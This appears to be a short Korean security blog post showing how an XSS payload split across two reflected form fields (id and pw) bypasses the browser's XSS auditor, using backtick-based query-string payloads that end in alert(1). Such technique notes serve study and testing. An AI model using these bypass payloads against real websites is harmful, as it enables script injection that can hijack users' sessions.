여러 라인에서 XSS 가 발생할 때 XSS auditor 를 우회가능하다.
아래에 예로 살펴보자.
<input type="text" name="id" value="$_GET['id']">
<input type="text" name="pw" value="$_GET['pw']">
?id="><script>/*&*/alert(1)</script>
<input type="text" name="id" value=""><script>/*">
<input type="text" name="id" value="*/alert<script>">
Auditor detected!!!
?id="><script>`&`;alert(1)</script>
<input type="text" name="id" value=""><script>`">
<input type="text" name="pw" value="`;alert(1)</script>">
Auditor bypassed!! execute alert!!!!!
Script tag Comments (0) | 2019.10.14 |
---|---|
UTF-8 'LINE SEPARATOR' (U+2028) (0) | 2019.10.14 |
XSS location.search trick (0) | 2019.08.10 |
XSS location (2) | 2019.08.09 |
RegRegExp.prototype.source (0) | 2019.08.09 |